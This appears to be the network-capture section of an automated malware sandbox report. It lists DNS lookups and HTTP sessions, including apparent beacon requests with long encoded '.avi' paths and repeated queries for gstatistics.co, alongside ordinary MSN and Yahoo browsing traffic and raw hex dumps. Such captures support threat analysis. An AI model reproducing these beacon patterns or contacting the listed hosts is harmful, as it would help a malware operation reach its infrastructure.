                                        Sep 10, 2021 11:34:43.664731026 CEST192.168.2.58.8.8.80x68bbStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:35:15.510564089 CEST192.168.2.58.8.8.80x1fb0Standard query (0)gstatistics.coA (IP address)IN (0x0001)
                                        Sep 10, 2021 11:35:43.641175985 CEST192.168.2.58.8.8.80x2bf9Standard query (0)gstatistics.coA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Sep 10, 2021 11:33:32.725291014 CEST8.8.8.8192.168.2.50xa44No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:36.136873960 CEST8.8.8.8192.168.2.50xe127No error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:36.734420061 CEST8.8.8.8192.168.2.50x3680No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:36.734420061 CEST8.8.8.8192.168.2.50x3680No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:36.796466112 CEST8.8.8.8192.168.2.50xd023No error (0)contextual.media.net23.211.6.95A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:39.570903063 CEST8.8.8.8192.168.2.50xb102No error (0)lg3.media.net23.211.6.95A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:40.270116091 CEST8.8.8.8192.168.2.50xee12No error (0)hblg.media.net23.211.6.95A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:41.702008009 CEST8.8.8.8192.168.2.50xc5a9No error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:45.029160976 CEST8.8.8.8192.168.2.50xdc30No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:45.029160976 CEST8.8.8.8192.168.2.50xdc30No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST8.8.8.8192.168.2.50xb92fNo error (0)s.yimg.comedge.gycpi.b.yahoodns.netCNAME (Canonical name)IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST8.8.8.8192.168.2.50xb92fNo error (0)edge.gycpi.b.yahoodns.net87.248.118.22A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:33:46.203030109 CEST8.8.8.8192.168.2.50xb92fNo error (0)edge.gycpi.b.yahoodns.net87.248.118.23A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST8.8.8.8192.168.2.50xdcd5No error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST8.8.8.8192.168.2.50xdcd5No error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST8.8.8.8192.168.2.50xdcd5No error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:16.564980030 CEST8.8.8.8192.168.2.50xdcd5No error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST8.8.8.8192.168.2.50x5ea4No error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST8.8.8.8192.168.2.50x5ea4No error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST8.8.8.8192.168.2.50x5ea4No error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:19.446614027 CEST8.8.8.8192.168.2.50x5ea4No error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST8.8.8.8192.168.2.50x68bbNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST8.8.8.8192.168.2.50x68bbNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST8.8.8.8192.168.2.50x68bbNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:34:43.695419073 CEST8.8.8.8192.168.2.50x68bbNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:35:15.549719095 CEST8.8.8.8192.168.2.50x1fb0No error (0)gstatistics.co185.186.142.136A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:35:15.549719095 CEST8.8.8.8192.168.2.50x1fb0No error (0)gstatistics.co95.181.198.158A (IP address)IN (0x0001)
                                        Sep 10, 2021 11:35:43.676727057 CEST8.8.8.8192.168.2.50x2bf9Server failure (2)gstatistics.cononenoneA (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • https:
                                          • geolocation.onetrust.com
                                          • s.yimg.com
                                        • ocsp.sca1b.amazontrust.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549764104.20.184.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.54982087.248.118.22443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.54985913.225.29.13280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData
                                        Sep 10, 2021 11:34:16.615251064 CEST5257OUTGET /images/GCf_2BVR4BU/cjyHO8rEu0PLMD/ddrHkS9VDXWI2BqJDWdKp/yP_2BPG48oRDpm0g/SrPkMCydca7dHbV/D9P1tAQMBBq8SvLL_2/BTpaf4v7U/VLIzcVH0j4WxrbYHQOZI/wYP1aj2dECCu_2F_2BC/mIwNPWeBCD7IMCmF8HTTO6/vdW_2F0_2BicH/w8p9PjDD/HtrueVxg_2FcH01kfOOydSo/XvV_2FKbIAaOsHpHpe/wMhAw.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:16.704760075 CEST5258INHTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:16 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 19fefe7d41cfedb99873c7b5cd95d411.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: M-AVApgN7Rkkcakg6nE3Nv191fRyl2z84hxWoQa7t177Bd0qw-f4xA==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        3192.168.2.54986313.225.29.13280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData
                                        Sep 10, 2021 11:34:19.499046087 CEST5260OUTGET /images/U6TeZm2GqJwloJv5oZSeI/2t0wwSFx0OdeCqwq/a5th_2BJswZzpBo/iTJZVc_2BHgWPPB64R/K3cCyKXGA/pha07BC_2FbaaosXoWHU/mqeKc0qKA2IsvzCoLJ0/i_2FxmVXC6GOzmCalRHRBS/X4qBHSkzHz0Gv/sQEy9HR7/NTPicd5UJLmarL1TQsRZspC/zIbC4QSojh/SXfsKqnthINSBZ4Hv/INUqZbTg0z/T.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:19.584824085 CEST5261INHTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:19 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 2114f6e9c6130b946922a303f84256b1.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: tDWkQ5VaW6mmrKey-_nhcm8ul9DXL3MsBdVucq2JGp99X83JAJ70vg==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        4192.168.2.54990713.225.29.13280C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData
                                        Sep 10, 2021 11:34:43.724298000 CEST8736OUTGET /images/GosV5rx1jUm_2/FeMYZexn/3AHfZUbwKtZ24NdOcSq0RlX/SFVlCboKYZ/q19iLR0UiFTMXXHua/7HDwQVQwW_2B/P2MZpE_2Fn2/TKqFG_2F5mAVKf/ACPvjzozYdfDpfYzdrt73/e9vTiEyeXLfMugv6/YOqbGPGETO_2FyR/6XOvuQnB29hcTxcqfB/1cP6Y9M6Q/pKhEyMS_2BB/ySEZOj.avi HTTP/1.1
                                        Accept: text/html, application/xhtml+xml, image/jxr, */*
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: ocsp.sca1b.amazontrust.com
                                        Connection: Keep-Alive
                                        Sep 10, 2021 11:34:43.813817978 CEST8737INHTTP/1.1 200 OK
                                        Content-Type: application/ocsp-response
                                        Content-Length: 5
                                        Connection: keep-alive
                                        Accept-Ranges: bytes
                                        Cache-Control: public, max-age=300
                                        Date: Fri, 10 Sep 2021 09:34:43 GMT
                                        ETag: "5f457bf7-5"
                                        Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                        Server: nginx
                                        X-Cache: Miss from cloudfront
                                        Via: 1.1 8513b0b4c77c9a98d13a007d589042ff.cloudfront.net (CloudFront)
                                        X-Amz-Cf-Pop: CDG3-C2
                                        X-Amz-Cf-Id: z_2pXzoy7ZS0VGBTG-mGcX3sT0nCP35aKr_YKxPqwR30sLgMBdt69A==
                                        Data Raw: 30 03 0a 01 06
                                        Data Ascii: 0


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.549764104.20.184.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-10 09:33:36 UTC0OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                        Accept: application/javascript, */*;q=0.8
                                        Referer: https://www.msn.com/de-ch/?ocid=iehp
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: geolocation.onetrust.com
                                        Connection: Keep-Alive
                                        2021-09-10 09:33:36 UTC0INHTTP/1.1 200 OK
                                        Date: Fri, 10 Sep 2021 09:33:36 GMT
                                        Content-Type: text/javascript
                                        Content-Length: 182
                                        Connection: close
                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                        Server: cloudflare
                                        CF-RAY: 68c7a7e13b42dfd7-FRA
                                        2021-09-10 09:33:36 UTC0INData Raw: 6a 73 6f 6e 46 65 65 64 28 7b 22 63 6f 75 6e 74 72 79 22 3a 22 43 48 22 2c 22 73 74 61 74 65 22 3a 22 5a 48 22 2c 22 73 74 61 74 65 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 22 7a 69 70 63 6f 64 65 22 3a 22 38 31 35 32 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 30 30 30 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 30 22 2c 22 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 55 22 7d 29 3b
                                        Data Ascii: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.54982087.248.118.22443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        TimestampkBytes transferredDirectionData
                                        2021-09-10 09:33:46 UTC0OUTGET /lo/api/res/1.2/BWUYr.M5U6.kf035wsX8Lg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1pbmk7cT0xMDA-/https://s.yimg.com/av/ads/1621266752856-586.jpg HTTP/1.1
                                        Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                        Referer: https://www.msn.com/de-ch/?ocid=iehp
                                        Accept-Language: en-US
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Accept-Encoding: gzip, deflate
                                        Host: s.yimg.com
                                        Connection: Keep-Alive
                                        2021-09-10 09:33:46 UTC1INHTTP/1.1 200 OK
                                        Content-Length: 195845
                                        Access-Control-Allow-Headers: X-Requested-With
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=2592000
                                        Content-Type: image/jpeg
                                        Edge-Cache-Tag: 343450606465613470501122455183989970294,415930648339712111872285657998251086336,ae7a14591aaf8d474cdb3f92111c923e
                                        Etag: "441833de41dfe8d94ac6f8ce4e751eba"
                                        Last-Modified: Fri, 18 Jun 2021 09:15:35 GMT
                                        Server: ATS
                                        Timing-Allow-Origin: *
                                        Accept-Ranges: bytes
                                        Date: Tue, 07 Sep 2021 10:42:04 GMT
                                        X-Served-By: cache-wdc5536-WDC
                                        X-Cache: HIT
                                        X-Cache-Hits: 1
                                        X-Timer: S1631011325.879705,VS0,VE1
                                        Age: 255102
                                        Strict-Transport-Security: max-age=15552000
                                        Referrer-Policy: no-referrer-when-downgrade
                                        X-Frame-Options: SAMEORIGIN
                                        cld_cache: HIT
                                        cld_hits: 1
                                        cld_by: cache-wdc5536-WDC
                                        cld_latency: 1
                                        Connection: close
                                        Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                        X-XSS-Protection: 1; mode=block
                                        X-Content-Type-Options: nosniff
                                        2021-09-10 09:33:46 UTC2INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 96 00 96 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 11 08 01 70 02 6e 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 05 08 03 04 09 02 01 00 0a ff c4 00 49 10 00 02 02 01 03 03 03 03 03 02 04 04 03 05 03 0d 01 02 03 11 04 05 12 21 00 13 31 06 22 41 07 14 51 23 32 61 08 71 15 42 81
                                        Data Ascii: JFIFCCpnI!1"AQ#2aqB
                                        2021-09-10 09:33:46 UTC3INData Raw: 8a 4e e5 8a 81 16 51 83 dd aa a8 00 2d 5f 23 9e b3 b3 0f 8d 4f ac 6e 25 ce c0 89 40 d8 a8 76 7a 66 34 ac 39 30 f1 5d 84 31 c9 0c 66 34 98 bb 90 4f b5 55 55 56 b6 56 e5 04 0b bb 03 8e 3a 59 6b 7a 7f 8e 64 8c f6 7e 77 66 ca 0a b0 ea 0b d2 c5 f5 73 93 7c 56 d0 5f a5 9c 7e cc 70 86 52 85 a4 44 53 cb 9d f2 31 da 37 71 c1 e6 eb c1 ab be 3a ec bc f6 6d 37 d3 6e 5c 84 79 12 eb 8f 31 57 ae 87 6a 73 f8 b1 be 0c 04 c6 91 8c 64 49 11 37 43 29 97 6f 6f de 79 1b 47 36 4f 23 91 f2 0f 34 3c 9f fc 8a ea 2a 39 67 9d 9b cb 48 60 2b 19 03 41 50 33 d8 b7 5b f2 89 fc 68 18 2c 70 c8 57 72 c8 d4 db 8a 87 7e 05 82 4d 02 49 26 f9 ff 00 ea c4 b5 2c 11 86 dc 9c 3e 7c f9 11 eb 07 48 4b 31 a1 16 ab 5b 26 f4 82 4c 78 65 8f 12 49 44 28 f2 3d c7 17 05 9e 8b 2a 82 8b c3 6e 04 1f 1f 8f 27
                                        Data Ascii: NQ-_#On%@vzf490]1f4OUUVV:Ykzd~wfs|V_~pRDS17q:m7n\y1WjsdI7C)ooyG6O#4<*9gH`+AP3[h,pWr~MI&,>|HK1[&LxeID(=*n'
                                        2021-09-10 09:33:46 UTC4INData Raw: b9 db a7 f5 10 9a bc 97 ff 00 2b b8 59 15 d5 80 51 b5 0d 6d 74 0d db 3e dd a0 7c dd 1f e7 80 cf 9b 32 80 07 09 c8 8c b6 b7 36 e5 a9 30 d4 99 48 15 17 55 5e f9 d1 bd 3d 48 a4 08 ea 09 28 13 f7 03 4b 22 22 88 76 95 00 4e 25 57 57 57 f3 b0 ad 0f 68 f6 91 55 d2 0a 52 d4 ca 6a fa 58 f2 ef 94 5a c9 f0 04 dc 11 9e 54 ad 45 a9 f2 5e 07 16 77 90 02 20 dc 7b 87 ba 0b 00 36 84 fd 52 6c d8 27 70 e6 ff 00 70 04 0e 96 71 a8 f3 86 8a 19 8a 4b bd 4b 0a bb ec 4b c4 7c fd b5 13 2b 23 21 48 d8 ac 9b 8d ac 21 4e d2 c4 f9 fc 9a f2 48 fe 07 50 52 93 2e a0 87 56 e6 a5 bb 06 22 02 d6 a0 95 33 58 53 b3 95 c8 2d a9 cc 5c cf 09 79 98 d3 22 45 ba 42 db a4 db 17 1b 4b a0 34 05 fe 09 23 fe dd 01 33 26 62 bd fa 6b 6e 43 d2 90 e4 c9 28 09 0c 58 b3 e6 f7 6c f3 d8 df d8 77 28 c6 42 3c 44
                                        Data Ascii: +YQmt>|260HU^=H(K""vN%WWWhURjXZTE^w {6Rl'ppqKKK|+#!H!NHPR.V"3XS-\y"EBK4#3&bknC(Xlw(B<D
                                        2021-09-10 09:33:46 UTC5INData Raw: eb b5 35 6c 7d 8b 37 6d 80 f6 ef 48 55 94 ff 00 d6 c1 87 4c 28 e2 00 1b 82 0b ec 2b eb de 90 ba 2d d6 22 75 82 f8 19 19 71 62 c2 9a 86 3e 33 41 3c 45 17 df 11 cc 98 ab b4 ad 66 9b 1b 25 54 95 27 98 df f8 e2 49 1f 77 08 71 47 7b fa d3 6d f5 8f 4e 51 49 0a 17 4b 11 e4 9d f9 d8 db ac 39 3d 0f a8 c1 ac e9 fa c6 21 79 00 9d 37 60 c0 bb 58 47 91 87 73 a6 d8 c8 35 20 72 c8 2f ca f0 05 75 51 3d 38 66 10 cd df 4a 45 ac 83 f7 65 8c 65 8f 2b 1f 87 ea d5 77 b4 0a e0 64 63 60 ea 9f 68 15 9a 1d 50 bc 32 19 58 06 dd 37 bb 14 85 0a cc 0a b9 78 5c 96 20 15 50 00 f1 d3 25 64 a1 58 18 e9 7d ad cb 28 59 84 a5 83 6f 62 c7 cb 62 33 f2 62 74 98 68 d2 41 2c 38 b2 87 c7 69 02 19 03 d9 48 cd 4c e4 02 15 d5 d1 85 03 e4 1b 1e 38 1a 14 43 62 37 bb e4 7b e9 05 52 c2 43 bb 05 7c d7 af
                                        Data Ascii: 5l}7mHUL(+-"uqb>3A<Ef%T'IwqG{mNQIK9=!y7`XGs5 r/uQ=8fJEee+wdc`hP2X7x\ P%dX}(Yobb3bthA,8iHL8Cb7{RC|
                                        2021-09-10 09:33:46 UTC7INData Raw: 4b 56 70 ae 14 bc 2e 0e 23 41 4c dc df ba 98 3b c6 65 4d 7a 4f b7 05 b1 e4 5c 55 88 80 11 25 11 c4 b1 f3 56 04 74 83 75 1a 07 c0 37 d5 6c d2 4c b7 51 7f 0a aa 74 19 5c 3f bd a2 cf 86 41 13 09 51 2c 75 62 1f a7 5d eb 4b 45 c1 fa 71 a9 88 da 08 25 00 56 39 04 25 a9 1b 68 ec 50 b5 b1 54 96 7d e6 8b d0 1f 8e b3 7c 62 53 f6 94 58 67 e5 5c c3 fe e3 5f c0 aa a1 a8 ca 48 a3 37 e2 b4 f7 02 3a 35 f4 91 3b ff 00 e1 b2 99 04 ac 44 4c 06 e3 7b 45 ec dc ae 7c 80 2a 87 07 f7 79 eb 17 c5 f8 4a 80 e9 e6 73 71 dd 84 6f be 9f fc 52 73 38 8f 51 6c f2 e7 7d 62 fb fa 64 23 c3 0b c8 3b 45 58 3f f0 3c 6d 6b e0 94 a1 f1 cf 93 d5 08 f1 2d 4f 5b fe 3d b7 df 73 a6 45 50 97 ad 99 fb ef 94 3b 34 d7 41 80 ef 1b 72 cb 2c be e1 fa 64 3a ed dd 1b f2 d6 cd 44 21 e2 fc 73 7d 0e 64 a7 0c 90
                                        Data Ascii: KVp.#AL;eMzO\U%Vtu7lLQt\?AQ,ub]KEq%V9%hPT}|bSXg\_H7:5;DL{E|*yJsqoRs8Ql}bd#;EX?<mk-O[=sEP;4Ar,d:D!s}d
                                        2021-09-10 09:33:46 UTC8INData Raw: 12 0c 69 24 95 55 56 15 0c 66 51 20 31 47 2b a9 da 84 d1 12 2d 5d 55 03 e3 a8 89 47 1e 16 0d f0 7c bb cd e0 c2 69 7f 19 7c ea 7b f3 be fa 6e c4 c1 26 c9 9a 6c 39 00 87 da a6 03 1d 92 a0 34 8d 2c 6a b6 aa ca 46 dd bf a6 f7 cd 1e 3a 94 b4 04 aa 60 29 06 a4 0d 1c 5a bc c6 63 dc c7 66 b1 4a 14 15 71 6d 39 6d 97 b1 88 7c b9 72 a4 8e 39 22 c7 c6 c8 42 f7 26 46 44 9d b9 12 46 53 da 51 1d 13 50 c5 56 76 7e e0 40 24 74 b4 e9 6b 55 9c 10 72 0c 5a c0 65 e5 a5 77 86 b8 40 97 67 06 e4 f5 60 3f 11 b2 23 94 e0 a7 66 28 e4 0d ba a6 9c c4 43 08 58 f7 da 20 b5 20 50 59 94 35 02 c5 40 3d 77 ed 78 03 b1 50 cc 1b bd b9 9b 1e ac 22 33 3c 33 14 c4 90 f6 7d ed dd 2b 4a 46 ae 3e 65 65 4f 18 44 8a 28 82 38 56 5b 9c 97 14 59 68 dc 96 e4 b0 40 dc 02 6c f1 d0 93 2c e7 db fb 69 1d 5a
                                        Data Ascii: i$UVfQ 1G+-]UG|i|{n&l94,jF:`)ZcfJqm9m|r9"B&FDFSQPVv~@$tkUrZew@g`?#f(CX PY5@=wxP"3<3}+JF>eeOD(8V[Yh@l,iZ
                                        2021-09-10 09:33:46 UTC9INData Raw: 30 35 cc 29 b6 be 8d 97 8e ad ed 06 e2 95 fe c6 52 68 6f 0d 13 ac 6e c4 51 0c 47 e7 a6 d2 01 71 ff 00 a9 6f 4d 8f 7e 51 5c a9 aa 0a 00 0c 20 ac 5b 30 69 cb 2f cc 7d f5 3c a5 e7 c4 d6 31 98 45 8d a8 e9 65 e7 48 32 94 ac 99 6a ca b9 b1 3a a8 f6 c8 93 45 1e 44 40 d9 1d c6 bf 27 af 49 49 48 50 38 aa 68 0d ab 9e 75 cb 6c aa 5e 19 9e 31 60 52 54 c1 81 20 35 68 2f 7b f9 c1 8f d3 8d 72 3c 7d 4d 65 44 45 74 93 17 50 28 1c 28 99 e2 db f7 49 19 01 54 b4 91 fb 90 1f dc db 94 dd 75 5f c6 a1 45 44 8a 5e ba 8b f2 ee d0 d7 06 ba 94 a8 92 90 41 ec f3 de 9b 03 06 be b9 d3 56 1d 79 a7 d3 24 58 63 93 22 3d 57 0d f6 8a 68 e4 5f bb 44 17 75 b6 61 22 14 f1 c8 af 83 d7 38 36 28 29 23 c5 67 39 3f 3d c5 e0 bc 42 5f 53 9f 2e ec 07 e2 36 f1 f5 01 ac a6 46 48 78 fb 98 3b 5a 55 57 0b
                                        Data Ascii: 05)RhonQGqoM~Q\ [0i/}<1EeH2j:ED@'IIHP8hul^1`RT 5h/{r<}MeDEtP((ITu_ED^AVy$Xc"=Wh_Dua"86()#g9?=B_S.6FHx;ZUW
                                        2021-09-10 09:33:46 UTC10INData Raw: fc c4 78 8f f8 e5 b2 74 6a 9c 87 3a 9d fc e0 2f d0 58 bf 6f 93 36 a1 3e 43 76 73 70 a5 c3
                                        Data Ascii: xtj:/Xo6>Cvsp
                                        2021-09-10 09:33:46 UTC10INData Raw: 48 ec bc cd 3e 3e 27 70 b8 86 82 ac 6f 57 bc dd f9 fc 74 f7 1d 30 a5 92 1b 41 7e ad a6 4c 47 c4 03 81 94 55 f7 14 68 1d d8 55 a8 68 73 ee f5 82 0c 4c b3 3e b0 15 57 66 31 91 d5 36 10 86 35 b2 68 12 42 85 f9 1c f1 ff 00 7e 91 50 2a 43 33 00 0e a6 a5 9e b4 1e dc e1 e9 6b 26 94 7c 66 d4 00 06 d6 87 99 f4 ca de fd 32 22 0e ca a4 68 d2 10 18 3b b6 e4 1b bd c5 19 d8 9d ee c2 b7 9a 08 ab 4a 07 24 8c df 1c a6 05 23 f8 83 57 15 d5 e9 4a 07 ca 35 7f 4d 04 b3 1f fa d0 bd fc da f9 3b de 3a 4d f4 7e 6e ca e1 cd 2a 2c c1 02 28 29 45 23 f2 65 66 09 54 bc fb 2c 5f 03 f3 d6 3b 8b 0e 4d 59 cb 53 a5 3b d2 37 bf 4f 55 13 8a c1 2a 72 37 6c f3 cf 98 8b db e9 62 b2 c2 88 1f 73 6e 54 11 90 fb 80 65 de 08 07 9d bb 3c 15 1c 9a fe 7a a6 fb 58 4a 89 71 76 d3 5d 2b e7 1a 89 2a 74 82
                                        Data Ascii: H>>'poWt0A~LGUhUhsL>Wf165hB~P*C3k&|f2"h;J$#WJ5M;:M~n*,()E#efT,_;MYS;7OU*r7lbsnTe<zXJqv]+*t
                                        2021-09-10 09:33:46 UTC12INData Raw: 38 7b 8c 4c ce c0 b1 7c 85 0f 4e a0 e9 15 93 65 a8 2a 68 04 e1 01 da 8f 7c ff 00 0d ae 51 35 36 33 e4 ea 59 11 a3 e2 ce 11 e4 37 08 32 63 c9 92 9b 64 19 8a ac 47 75 5d 58 85 69 02 94 36 54 73 d1 43 aa 61 0a 23 0b d0 81 5c c9 7a db d6 20 85 61 40 24 29 c8 04 e2 ab 6d 4c ee f5 6a 5e 37 21 c7 18 38 c9 9a c0 4b 97 32 7d c3 62 e2 46 0a 08 63 7e da c9 18 a6 5f d8 ae 54 b8 dc 84 15 03 f2 c2 65 32 dc db bb 67 e9 f9 81 99 bf 73 ee 01 42 91 6f 36 04 ee 6f fd 44 84 b8 d0 1c b5 c7 d2 e3 2c d9 c8 eb 1e 26 5f 73 be d8 ca 8a cd 3a 30 01 1c f0 de d0 4b 6e 5b 0a 38 00 a6 4a 31 a8 84 e7 53 ae 75 7a 54 3f 47 bc 42 5c f5 aa 4a cc c5 a4 2a 59 60 40 64 dd c3 e6 f7 f7 c9 a3 1e a1 87 8f 32 e2 ba 44 0c 10 64 45 8b 3a b0 64 c7 91 55 76 bb 80 36 b3 4c 1e 91 8c 9b 56 38 d8 b1 a0 0f
                                        Data Ascii: 8{L|Ne*h|Q563Y72cdGu]Xi6TsCa#\z a@$)mLj^7!8K2}bFc~_Te2gsBo6oD,&_s:0Kn[8J1SuzT?GB\J*Y`@d2DdE:dUv6LV8
